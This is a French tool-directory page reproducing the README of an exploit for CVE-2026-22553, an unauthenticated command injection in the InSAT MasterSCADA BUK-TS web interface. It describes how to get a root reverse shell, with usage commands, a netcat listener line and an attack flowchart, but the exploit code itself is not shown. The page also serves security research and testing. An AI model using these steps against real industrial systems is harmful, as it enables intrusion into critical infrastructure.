Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — Exploit d'injection de commandes OS non authentifiée pour l'interface web InSAT MasterSCADA BUK-TS MMadmServ. Fournit un reverse shell avec privilèges root via une requête HTTP POST. CVSS 9.8 critique. | Kitploit
Outils/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Génération de PayloadsExploitationSécurité SCADA/ICSExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Exploit d'injection de commandes OS non authentifiée pour l'interface web InSAT MasterSCADA BUK-TS MMadmServ. Fournit un reverse shell avec privilèges root via une requête HTTP POST. CVSS 9.8 critique.

Voir le dépôt
13il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - RCE non authentifiée

CVE-2026-22553 | CVSS 9.8 Critique| Auteur de l'exploit : Mohammed Idrees Banyamer


📝 Description

InSAT MasterSCADA BUK-TS présente une vulnérabilité d'injection de commandes système sans authentification dans l'interface web MMadmServ. Cette faille permet à un attaquant distant d'obtenir une exécution de code à distance (RCE) complète sans aucune authentification.

  • Produit concerné : InSAT MasterSCADA BUK-TS (toutes les versions)
  • Type de vulnérabilité : Injection de commandes système (CWE-78)
  • Sévérité : Critique (Score CVSS v3.1 : 9.8)
  • Auteur de l'exploit : Mohammed Idrees Banyamer
  • Pays : Jordanie 🇯🇴

🛠️ Diagramme de la méthode d'attaque

flowchart TD
    A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
    B -->|Unauthenticated| C[Vulnerable Parameter]
    C -->|OS Command Injection| D[Command Execution on Target Server]
    D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
    
    style A fill:#ff4d4d,stroke:#fff
    style E fill:#4dff88,stroke:#fff

🚀 Utilisation

python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>

Exemple

python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444

Options

OptionDescription
targetURL cible (ex. http://ip:port)
--lhostVotre adresse IP (reverse shell)
--lportVotre port d'écoute

📌 Comment l'utiliser

  1. Démarrez un listener sur votre machine :

    nc -lvnp 4444
    
  2. Exécutez l'exploit :

    python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
    
  3. Obtenez un reverse shell avec les privilèges root/système.


⚠️ Avertissement

Cet exploit est fourni à des fins éducatives et de tests d'intrusion autorisés uniquement.
Toute utilisation non autorisée contre des systèmes qui ne vous appartiennent pas est illégale et peut violer les lois internationales.
L'auteur décline toute responsabilité en cas d'utilisation abusive.


📬 Auteur

Mohammed Idrees Banyamer

  • Instagram : @banyamer_security
  • GitHub : mbanyamer
  • Pays : Jordanie 🇯🇴

Mettez une étoile ⭐ à ce dépôt si vous l'avez trouvé utile !

Télécharger l’outil